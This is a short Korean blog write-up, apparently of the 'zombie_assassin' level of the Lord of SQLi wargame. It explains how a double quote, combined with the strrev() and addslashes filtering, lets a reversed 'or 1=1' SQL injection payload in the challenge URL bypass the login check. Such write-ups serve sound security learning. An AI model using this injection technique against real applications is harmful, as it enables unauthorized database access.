17. LOS - zombie_assassin
2021. 1. 30. 13:50ㆍWarGame/LOS
해당 문자에서는
strrev() --> 문자열 뒤집기
addslashes --> \ 추가
필터링이 들어가있다.
select id from prob_zombie_assassin where id='' and pw=''
쿼리에서 id에 "를 넣어주게 되면
query :select id from prob_zombie_assassin where id='"\' and pw=''
처럼 처리가 된다.
그러면
id=("\' and pw = ) 까지를 id로 인식하기 때문에 뒤에 or 1=1 -- - 넣어주면 된다.
los.rubiya.kr/chall/zombie_assassin_eac7521e07fe5f298301a44b61ffeec0.php?id=%22&pw=%20-%20--1=1%20%20ro
뒤집어서 넣어줘야하는거 잊으시면 안됩니다.
'WarGame > LOS' 카테고리의 다른 글
| 19. LOS - XAVIS (0) | 2021.01.31 |
|---|---|
| 18. LOS - NIGHTMARE (0) | 2021.01.30 |
| 16. LOS - succubus (0) | 2021.01.29 |
| 15. LOS - assassin (0) | 2021.01.29 |
| 14. LOS - gian (0) | 2021.01.28 |